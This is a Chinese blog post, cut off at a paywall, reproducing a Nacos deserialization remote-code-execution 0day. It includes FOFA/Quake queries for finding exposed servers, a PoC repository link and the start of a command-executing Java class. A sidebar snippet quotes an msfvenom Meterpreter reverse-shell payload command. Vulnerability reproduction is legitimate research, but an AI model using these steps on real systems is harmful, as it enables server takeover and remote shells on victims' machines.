Nacos最新0day漏洞复现

最新推荐文章于 2025-06-28 11:50:48 发布
最新推荐文章于 2025-06-28 11:50:48 发布
阅读量4.9k 收藏 13
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/140452933

目录

一、漏洞原理

二、版本信息

三、资产测绘

四、poc信息

五、总结

一、漏洞原理

   漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境https://github.com/ayoundzw/nacos-poc这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。

启动nacos:

D:\nacos\bin>startup.cmd -m standalone

二、版本信息

目前据说版本是2.32-2.40版本

三、资产测绘

fofa: app="NACOS"

quake: app:"NACOS"

四、poc信息

利用工具:

GitHub - ayoundzw/nacos-poc

构造恶意类:

package test.poc;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.StringWriter;

public class Example {
    public Example() {
    }

    public static void main(String[] args) {
        String ret = exec("ipconfig");
        System.out.println(ret);
    }

    public static String exec(String cmd) {
        StringBuffer bf = new StringBuffer();

        try {
            String charset = "utf-8";
            String osName = System.getProperty("os.name");
            if (osName != nul
最低0.47元/天 解锁文章

200万优质内容无限畅学
nacos - 0 day 【已成功复现
Grace_for_it的博客
07-17 1809
nacos-0day-rce漏洞分析,poc利用介绍
重大0day漏洞预警:Nacos 漏洞触发远程代码执行
weixin_55163056的博客
07-22 1675
Nacos中新发现的0day漏洞可以触发远程代码执行,开源网安RASP团队检测并分析出三种类型的攻击:不安全的反射漏洞、SQL注入攻击、命令注入
0-day预警-NACOS RCE-0day漏洞复现
Success696的博客
07-15 2907
配置config.py中的ip和端口,执行service.py。fofa语法: icon_hash=“13942501”ZoomEye语句:app:“Alibaba Nacos”执行exploit.py,输入地址和命令即可执行。下载nacos版本,项目地址。
# 实战攻防之Nacos漏洞(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
06-28 1374
实战nacos漏洞复现记录一下,大佬勿喷。如果,有不对的可以指正一下,一起学习。Nacos是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台,由阿里巴巴开源。它致力于帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos支持几乎所有主流类型的服务发现、配置和管理,包括Kubernetes Service、gRPC & Dubbo RPC Service、Spring Cloud RESTful Service等。
Nacos漏洞总结复现
heike_Ch的博客
04-23 1816
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos 202407月RCE漏洞(0day)与复现
分享不一样的技术,与你一起共同成长!
07-31 5095
202407月, 爆出漏洞作者说由于某些原因,特意爆出了Nacos的一个RCE 0day漏洞Nacos 是一个用于动态服务发现和配置以及服务管理的平台,Derby 是一个轻量级的嵌入式数据库。接口 /nacos/v1/cs/ops/derby 和 /nacos/v1/cs/ops/data/removal 在使用 Derby 数据库作为内置数据源时。用于运维人员进行数据运维和问题排查,在使用 standalone 模式启动 Nacos 时,为了避免因搭建外置数据库而占用额外的资源...
速报:Nacos最新0day漏洞的临时修补方案
ABC_123的博客
07-15 849
Part1 前言大家好,我是ABC_123。今天下午github上有网友公布了最新nacos远程代码执行漏洞及exp,目前官方补丁还没出来,这里ABC_123给大家提供一个临时的漏洞修补方案。Part2 技术研究过程首先这个nacos0day漏洞是真实存在的,危害是很严重的,再者这是一个登录后台才能利用的漏洞,而且出网才能利用。有网友会说,有的nacos不需要登录后台也能打,那是因为所...
Blitz团队发现新0day漏洞并实现复现
nacos-poc-main可能是Blitz团队用于复现Nacos相关的0DAY漏洞的POC项目文件。这表明Blitz团队不仅发现了潜在的漏洞,而且已经实现了能够展示该漏洞存在和工作原理的代码示例。 总结: Blitz团队发现的0DAY漏洞需要...
【传送点】上千漏洞复现复现集合 exp poc 持续更新
失心少年
11-28 4537
漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现】Array VPN任意文件读取漏洞漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞
突发!github公开爆出nacos RCE 0day 【已成功复现
棉花糖的博客
07-15 2253
Nacos是一个开源的微服务架构平台,主要用于动态服务发现、配置管理和服务管理。此次0day影响范围极大。
nacos漏洞复现
Scorpio_m7
02-09 1万+
????写在前面 ????博客主页:Scorpio_m7,github ????欢迎关注????点赞????收藏⭐️留言???? ????本文由 Scorpio_m7原创,CSDN首发! ????首发时间:????2022年2月9日???? ✉️坚持和努力一定能换来诗与远方! ????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! 文章目录????写在前面概述环境搭建Linuxwindows漏洞复现信息泄露任意用户创建使用Spring Boot获得账号及密码关键信息后台未授权登录 概述
Flash 0day漏洞(CVE-2018-4878)复现
dfdhxb995397的博客
03-13 240
漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。 本文作者:i春秋作家——F0rmat 前言 这几天很忙,已经有两天没有更新文章了,最近CVE-2018-4878挺火的,还有群里的人也问这个怎么复现。今天就献丑复现一下,大表哥别喷,虽然我还没研究到这方面的漏洞分析,...
微信 0day漏洞复现
热门推荐
星落的博客
04-19 1万+
目录 漏洞简介 影响版本 CS安装 漏洞复现 修复建议 漏洞简介 由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限 影响版本 <=3.2.1.141(Windows系统) CS安装 下载地址链接:https://pan.baidu.com/s/19En7Pkz7HIeey82PUvEBwQ 提取码:fczw 在ka...
某信0day漏洞复现
qq_46331143的博客
04-19 498
测试流程: 攻击机:kali,192.168.43.200 受害机:win10,192.168.43.107 测试版本: 首先生成一段shellcode: msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.43.200 lport=5555 -e x86/shikata_ga_nai -b "\x00" -i 15 -f num -o /root/payload.txt 此时在root用户家目录下生成了一段shellcode代码的txt文
nacos越权漏洞复现
u013008898的博客
02-06 1523
nacos越权漏洞复现
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值